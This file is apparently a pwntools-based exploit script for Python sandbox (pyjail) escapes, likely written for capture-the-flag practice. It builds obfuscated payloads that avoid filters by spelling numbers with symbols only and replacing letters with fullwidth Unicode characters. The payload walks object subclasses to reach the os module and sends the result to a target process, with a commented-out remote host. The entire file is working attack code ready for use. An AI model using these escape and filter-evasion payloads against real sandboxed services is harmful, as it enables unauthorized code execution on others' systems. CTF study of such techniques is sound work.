exploit_jailbreaker_python.py

from pwn import *

def send(p, pl: bytes, error_msg='No output received.', print_rcv=True):
    """ send payload and print the resulting output."""
    p.sendline(pl)
    try:
        received = p.recv(timeout=0.5).decode()
        if print_rcv:
            print(received)
        return received
    except EOFError:
        print(error_msg)

# https://halb.it/posts/bluehens-pyjail/
def craft_num(n):
    """
    craft symbol-only numbers, in an inefficient way
    """
    str_0 = "-([]<[])"
    str_1 = "(-~([]<[]))"
    if n == 0:
        return str_0
    ret = f"{str_1}+" * n
    return ret[:-1]

def denormalize(str):
    ret = ""
    for c in str:
        if c >= "a" and c <= "z":
            # https://www.compart.com/en/unicode/U+FF41
            # weird fullwidth a
            # the first of a sequence of codepoints compatible with ASCII letters
            weird_a = 0xff41
            offset = ord(c) - ord("a")
            ret += chr(weird_a + offset)
        else:
            ret += c
    # replace all underscores that are not at the beginning of an identifier with
    # https://www.compart.com/en/unicode/U+FF3F
    # fullwidth underscore
    ret = re.sub(r"(?<![\.\[\( ])_", chr(0xff3f), ret)
    return ret

def main():

    #p = remote('host', 443, ssl=True)
    p = process("/bin/sh")

    #pl = b'[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "catch_warnings"][0].__repr__.im_func.func_globals["linecache"].os'

    # If letters and numbers are filtered
    # use denormalize() for letters
    # use craft_num for numbers
    pl = denormalize(f'[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "catch_warnings"][{craft_num(0)}].__repr__.im_func.func_globals["linecache"].os').encode()

    send(p, pl)


if __name__ == '__main__':
    main()